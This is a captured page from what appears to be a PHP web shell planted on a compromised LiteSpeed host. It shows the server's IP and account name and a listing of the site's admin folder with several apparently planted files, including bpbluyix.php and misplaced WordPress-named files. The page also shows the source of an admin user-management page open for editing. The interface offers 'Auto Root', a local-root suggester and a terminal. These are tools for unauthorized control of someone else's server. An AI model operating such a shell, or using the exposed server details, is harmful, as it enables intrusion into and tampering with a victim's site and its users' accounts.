Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.6
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
julaysp1 /
public_html /
admin /
Delete
Unzip
Name
Size
Permission
Date
Action
assets
[ DIR ]
dr-xr-xr-x
2025-09-01 07:26
includes
[ DIR ]
dr-xr-xr-x
2025-09-01 07:26
order
[ DIR ]
dr-xr-xr-x
2025-09-01 07:26
pages
[ DIR ]
dr-xr-xr-x
2025-09-01 07:26
.htaccess
237
B
-r-xr-xr-x
2025-09-01 07:26
404.php
219.19
KB
-rw-r--r--
2024-10-25 15:16
admin_file_upload.php
2.96
KB
-rw-r--r--
2024-11-16 10:37
all_list.php
2.1
KB
-rw-r--r--
2024-10-25 15:16
amount_auto.php
2.39
KB
-rw-r--r--
2025-05-29 16:26
balance_add_remove.php
2.83
KB
-rw-r--r--
2024-10-26 14:38
balance_update.php
622
B
-rw-r--r--
2024-11-09 07:20
bio.php
10.72
KB
-rw-r--r--
2024-11-20 16:13
bio_cancel.php
5.35
KB
-rw-r--r--
2024-11-20 16:14
bio_complete.php
5.35
KB
-rw-r--r--
2024-11-20 16:14
bonus_control.php
4.55
KB
-rw-r--r--
2024-10-25 15:29
bpbluyix.php
760
B
-rw-r--r--
2025-08-31 20:43
change_bonus.php
1.33
KB
-rw-r--r--
2024-10-25 15:28
createLink.php
4.61
KB
-rw-r--r--
2024-11-14 09:25
dashboard.php
10.96
KB
-rw-r--r--
2024-11-20 16:17
delete_data.php
6.51
KB
-rw-r--r--
2025-01-29 08:05
error_log
36.41
MB
-rw-r--r--
2025-08-30 18:33
file_cancel.php
5.61
KB
-rw-r--r--
2024-11-20 16:18
file_pending.php
14.5
KB
-rw-r--r--
2024-11-20 16:24
file_success.php
6.1
KB
-rw-r--r--
2024-11-20 16:25
footer.php
2.17
KB
-rw-r--r--
2024-11-15 15:08
get_work_history.php
1.4
KB
-rw-r--r--
2024-11-14 17:27
get_work_summary.php
1.05
KB
-rw-r--r--
2024-11-14 17:28
header.php
14.51
KB
-rw-r--r--
2025-05-29 16:34
index.php
4.7
KB
-rw-r--r--
2024-12-04 08:13
logout.php
313
B
-rw-r--r--
2024-11-13 15:50
nid_pending.php
14.65
KB
-rw-r--r--
2024-11-20 16:25
on_off.php
15.09
KB
-rw-r--r--
2024-11-17 07:16
on_off_test.php
14.85
KB
-rw-r--r--
2024-11-17 06:25
profile.php
4.23
KB
-rw-r--r--
2024-10-25 15:16
recharge_history.php
2.64
KB
-rw-r--r--
2024-10-26 14:25
sign_pending.php
16.26
KB
-rw-r--r--
2024-11-20 16:26
token.php
3.27
KB
-rw-r--r--
2025-05-29 16:32
update_marquee.php
4.88
KB
-rw-r--r--
2024-10-27 17:24
user_list.php
7.29
KB
-rw-r--r--
2024-10-31 14:05
work_history.php
4.6
KB
-rw-r--r--
2024-11-15 10:39
wp-blog-header.php
2.73
KB
-r--r--r--
2025-09-01 07:25
wp-cron.php
2.73
KB
-rw-r--r--
2025-09-01 07:25
Save
Rename
<link rel="stylesheet" href="assets/vendors/datatables.net-bs4/datatable.css"> <?php session_start(); include_once("header.php"); if(!isset($_SESSION["admin_id"])){ header("location: dashborad.php"); exit; } ?> <style> form#balance_form { width: 300px; margin: 0; } form#domain { width: 280px; margin: 0; } </style> <div class="row"> <div class="col-md-12"> <div class="card mb-4"> <?php include 'includes/marquee.php'; $id =4; $marquee = new Marquee($conn, $id); $marquee->display(); ?> </div> </div> <div class="container overflow-auto"> <div class="card my-3 py-4 px-2"> <table id="myTable" class="table table-striped table-hover"> <thead> <tr> <th>#</th> <th>Email</th> <th>Number</th> <th>Link</th> <th>Balance</th> <th>Status</th> <th>Delete</th> <th>Change Password</th> </tr> </thead> <tbody> <?php $user = $_SESSION["user_token"]; $sql = "SELECT * from users"; $result = $conn->query($sql); $cnt = 1; if ($result->num_rows > 0) { // output data of each row while($row = $result->fetch_assoc()) { $id = $row["id"]; $email = $row["email"]; $domain = $row["domain"]; $api_key = $row["api_key"]; $token = $row["token"]; $balance = $row["balance"]; $status = $row["status"]; $number = $row["mobile"]; ?> <tr> <td><?php echo $cnt;?></td> <td><?php echo $email;?></td> <td><?php echo $number;?></td> <td> <form action="pages/udpate_token.php" id="domain" method="post"> <div class="input-group"> <button type="button" class="btn btn-secondary" onclick="copyLink(event, this)">Copy Link</button> <input type="text" name="id" hidden value="<?php echo $id; ?>"> <input type="text" name="old_token" value="<?php echo $token; ?>" hidden class="form-control"> <input type="text" hidden name="hidden_link" class="hidden_link" value="<?php echo $_SERVER['HTTP_HOST']."/index.php?text_token=".$token; ?>"> <div class="input-group-append"> <button name="token_submit" onclick="return confirm('Do you want to regenerate token for <?php echo $email; ?>?');" type="submit" class="input-group-text text-secondary">Generate New</button> </div> </div> </form> </td> <td> <form id="balance_form" action="pages/balance_add.php" method="post"> <div class="input-group"> <div class="input-group-prepend"> <span class="input-group-text"><?php echo $balance;?></span> </div> <input type="number" name="balance" class="form-control" placeholder="Add Balance put here"> <input type="text" name="id" hidden value="<?php echo $id;?>"> <div class="input-group-append"> <button name="submit" onclick="return confirm('Do you want add Balance <?php echo $email; ?>');" type="submit" class="btn btn-secondary">Add</button> </div> </div> </form> </td> <td><?php if($status == 1){ ?> <a onclick="return confirm('Do you want deactive this user <?php echo $email; ?>');" href="pages/active_deactive.php?token=<?php echo $token; ?>&status=<?php echo $status; ?>"><button class="btn btn-success">Active</button></a> <?php }else{ ?> <a onclick="return confirm('Do you want active this user <?php echo $email; ?>');" href="pages/active_deactive.php?token=<?php echo $token; ?>&status=<?php echo $status; ?>"><button class="btn btn-danger">Active</button></a> <?php } ?></td> <td><a onclick="return confirm('Do you want Delete this user <?php echo $email; ?>');" href="pages/delete_user.php?token=<?php echo $token; ?>"><button class="btn btn-danger">Delete</button></a> </td> <td> <button class="btn btn-warning" onclick="changePassword('<?php echo $token; ?>', '<?php echo $email; ?>');">ChangePass</button> </td> </tr> <?php $cnt = $cnt + 1; } } ?> </tbody> </table> </div> </div> <?php include_once("footer.php");?> <script src="https://cdn.datatables.net/1.13.4/js/jquery.dataTables.min.js"></script> <script> $(document).ready(function () { $('.nav-item').removeClass('active'); $('.user_list').addClass('active'); $('#myTable').DataTable({ "info": false, "ordering": false, "language": { "search": '<i class="fa-solid fa-magnifying-glass"></i>', 'searchPlaceholder': "search here..." } }); }); function copyLink(event, button) { event.preventDefault(); // Prevent any default action (like form submission) // Find the closest form to the clicked button var form = button.closest("form"); // Get the hidden input element in the form var hiddenLinkInput = form.querySelector("input[name='hidden_link']"); // Copy the hidden input value to the clipboard navigator.clipboard.writeText(hiddenLinkInput.value).then(function() { alert("Link copied to clipboard: " + hiddenLinkInput.value); }).catch(function(error) { console.error("Failed to copy text: ", error); }); } function changePassword(token, email) { Swal.fire({ title: 'Change Password', input: 'text', inputLabel: 'Enter new password for ' + email, inputPlaceholder: 'New password', showCancelButton: true, confirmButtonText: 'Change', cancelButtonText: 'Cancel', inputAttributes: { 'aria-label': 'Type your password here' }, preConfirm: (newPassword) => { if (!newPassword) { Swal.showValidationMessage('You need to enter a password'); } else { return newPassword; } } }).then((result) => { if (result.isConfirmed) { $.ajax({ url: 'pages/change_password_admin.php', type: 'POST', data: { token: token, new_password: result.value }, success: function(response) { // Ensure the response is an object if (response.success) { Swal.fire('Success!', 'Password changed successfully.', 'success'); location.reload(); // Reload the page to see changes } else { Swal.fire('Error!', response.message || 'An unexpected error occurred.', 'error'); console.log(response); } }, error: function() { Swal.fire('Error!', 'Failed to change password.', 'error'); } }); } }); } </script>